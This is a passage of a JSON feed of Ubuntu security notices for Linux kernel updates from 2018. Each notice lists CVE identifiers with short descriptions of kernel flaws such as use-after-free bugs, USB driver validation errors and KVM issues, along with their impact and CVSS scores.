"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10. \nThis update provides the corresponding updates for the Linux Hardware \nEnablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the Linux \nkernel did not properly handle suspend and resume events. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page allocation. An \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)", "edition": 6, "modified": "2018-04-03T00:00:00", "published": "2018-04-03T00:00:00", "id": "USN-3617-2", "href": "https://ubuntu.com/security/notices/USN-3617-2", "title": "Linux (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:26:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "It was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the Linux \nkernel did not properly handle suspend and resume events. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page allocation. An \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)", "edition": 5, "modified": "2018-04-03T00:00:00", "published": "2018-04-03T00:00:00", "id": "USN-3617-1", "href": "https://ubuntu.com/security/notices/USN-3617-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:03", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16649", "CVE-2018-9363", "CVE-2016-9588", "CVE-2018-16658", "CVE-2017-13168"], "description": "Jim Mattson discovered that the KVM implementation in the Linux kernel \nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual \nmachine could use this to cause a denial of service (guest OS crash). \n(CVE-2016-9588)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly enforce permissions on kernel memory access. A local attacker \ncould use this to expose sensitive information or possibly elevate \nprivileges. (CVE-2017-13168)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nIt was discovered that an integer overflow existed in the CD-ROM driver of \nthe Linux kernel. A local attacker could use this to expose sensitive \ninformation (kernel memory). (CVE-2018-16658)\n\nIt was discovered that an integer overflow existed in the HID Bluetooth \nimplementation in the Linux kernel that could lead to a buffer overwrite. \nAn attacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-9363)", "edition": 3, "modified": "2018-11-14T00:00:00", "published": "2018-11-14T00:00:00", "id": "USN-3822-1", "href": "https://ubuntu.com/security/notices/USN-3822-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16649", "CVE-2018-9363", "CVE-2016-9588", "CVE-2018-16658", "CVE-2017-13168"], "description": "USN-3822-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nJim Mattson discovered that the KVM implementation in the Linux kernel \nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual \nmachine could use this to cause a denial of service (guest OS crash). \n(CVE-2016-9588)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly enforce permissions on kernel memory access. A local attacker \ncould use this to expose sensitive information or possibly elevate \nprivileges. (CVE-2017-13168)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nIt was discovered that an integer overflow existed in the CD-ROM driver of \nthe Linux kernel. A local attacker could use this to expose sensitive \ninformation (kernel memory). (CVE-2018-16658)\n\nIt was discovered that an integer overflow existed in the HID Bluetooth \nimplementation in the Linux kernel that could lead to a buffer overwrite. \nAn attacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-9363)", "edition": 4, "modified": "2018-11-14T00:00:00", "published": "2018-11-14T00:00:00", "id": "USN-3822-2", "href": "https://ubuntu.com/security/notices/USN-3822-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8043", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-16913", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-17862", "CVE-2017-18075", "CVE-2017-0861", "CVE-2017-7518", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16912", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16995", "CVE-2017-11472", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16536", "CVE-2017-1000407", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-7492", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16528", "CVE-2017-16914", "CVE-2017-16645", "CVE-2017-17806"], "description": "Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation \nin the Linux kernel improperly performed sign extension in some situations. \nA local attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-16995)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that an information disclosure vulnerability existed in \nthe ACPI implementation of the Linux kernel. A local attacker could use \nthis to expose sensitive information (kernel memory addresses). \n(CVE-2017-11472)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nIt was discovered that the Advanced Linux Sound Architecture (ALSA) \nsubsystem in the Linux kernel contained a use-after-free when handling \ndevice removal. A physically proximate attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2017-16528)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the Conexant cx231xx USB video capture \ndriver in the Linux kernel did not properly validate interface descriptors. \nA physically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16536)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the USB Virtual Host Controller Interface (VHCI) \ndriver in the Linux kernel contained an information disclosure vulnerability. \nA physically proximate attacker could use this to expose sensitive \ninformation (kernel memory). (CVE-2017-16911)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not validate endpoint numbers. A remote attacker could use this to \ncause a denial of service (system crash). (CVE-2017-16912)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not properly validate CMD_SUBMIT packets. A remote attacker could use \nthis to cause a denial of service (excessive memory consumption). \n(CVE-2017-16913)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ncontained a NULL pointer dereference error. A remote attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-16914)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netlink subsystem in the Linux kernel did not \nproperly restrict observations of netlink messages to the appropriate net \nnamespace. A local attacker could use this to expose sensitive information \n(kernel netlink traffic). (CVE-2017-17449)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the core USB subsystem in the Linux kernel did not \nvalidate the number of configurations and interfaces in a device. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-17558)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a \ntask's default keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF) \nimplementation in the Linux kernel contained a branch-pruning logic issue \naround unreachable code. A local attacker could use this to cause a denial \nof service. (CVE-2017-17862)\n\nIt was discovered that the parallel cryptography component of the Linux \nkernel incorrectly freed kernel memory. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-18075)\n\nIt was discovered that a race condition existed in the Device Mapper \ncomponent of the Linux kernel. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2017-18203)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that an infinite loop could occur in the madvise(2) \nimplementation in the Linux kernel in certain circumstances. A local \nattacker could use this to cause a denial of service (system hang). \n(CVE-2017-18208)\n\nAndy Lutomirski discovered that the KVM implementation in the Linux kernel \nwas vulnerable to a debug exception error when single-stepping through a \nsyscall. A local attacker in a non-Linux guest vm could possibly use this \nto gain administrative privileges in the guest vm. (CVE-2017-7518)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) \nimplementation in the Linux kernel contained an out-of-bounds write \nduring RDMA page allocation. An attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)\n\nIt was discovered that an integer overflow error existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that a NULL pointer dereference existed in the RDS \n(Reliable Datagram Sockets) protocol implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2018-7492)\n\nIt was discovered that the Broadcom UniMAC MDIO bus controller driver in \nthe Linux kernel did not properly validate device resources. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-8043)", "edition": 7, "modified": "2018-04-04T00:00:00", "published": "2018-04-04T00:00:00", "id": "USN-3619-1", "href": "https://ubuntu.com/security/notices/USN-3619-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:31", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8043", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-16913", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-17862", "CVE-2017-18075", "CVE-2017-0861", "CVE-2017-7518", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16912", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16995", "CVE-2017-11472", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16536", "CVE-2017-1000407", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-7492", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16528", "CVE-2017-16914", "CVE-2017-16645", "CVE-2017-17806"], "description": "USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation \nin the Linux kernel improperly performed sign extension in some situations. \nA local attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-16995)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that an information disclosure vulnerability existed in \nthe ACPI implementation of the Linux kernel. A local attacker could use \nthis to expose sensitive information (kernel memory addresses). \n(CVE-2017-11472)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nIt was discovered that the Advanced Linux Sound Architecture (ALSA) \nsubsystem in the Linux kernel contained a use-after-free when handling \ndevice removal. A physically proximate attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2017-16528)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the Conexant cx231xx USB video capture \ndriver in the Linux kernel did not properly validate interface descriptors. \nA physically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16536)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the USB Virtual Host Controller Interface (VHCI) \ndriver in the Linux kernel contained an information disclosure \nvulnerability. A physically proximate attacker could use this to expose \nsensitive information (kernel memory). (CVE-2017-16911)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not validate endpoint numbers. A remote attacker could use this to \ncause a denial of service (system crash). (CVE-2017-16912)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not properly validate CMD_SUBMIT packets. A remote attacker could use \nthis to cause a denial of service (excessive memory consumption). \n(CVE-2017-16913)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ncontained a NULL pointer dereference error. A remote attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-16914)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netlink subsystem in the Linux kernel did not \nproperly restrict observations of netlink messages to the appropriate net \nnamespace. A local attacker could use this to expose sensitive information \n(kernel netlink traffic). (CVE-2017-17449)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the core USB subsystem in the Linux kernel did not \nvalidate the number of configurations and interfaces in a device. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-17558)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF) \nimplementation in the Linux kernel contained a branch-pruning logic issue \naround unreachable code. A local attacker could use this to cause a denial \nof service. (CVE-2017-17862)\n\nIt was discovered that the parallel cryptography component of the Linux \nkernel incorrectly freed kernel memory. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-18075)\n\nIt was discovered that a race condition existed in the Device Mapper \ncomponent of the Linux kernel. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2017-18203)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that an infinite loop could occur in the madvise(2) \nimplementation in the Linux kernel in certain circumstances. A local \nattacker could use this to cause a denial of service (system hang). \n(CVE-2017-18208)\n\nAndy Lutomirski discovered that the KVM implementation in the Linux kernel \nwas vulnerable to a debug exception error when single-stepping through a \nsyscall. A local attacker in a non-Linux guest vm could possibly use this \nto gain administrative privileges in the guest vm. (CVE-2017-7518)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page \nallocation. An attacker could use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)\n\nIt was discovered that an integer overflow error existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). 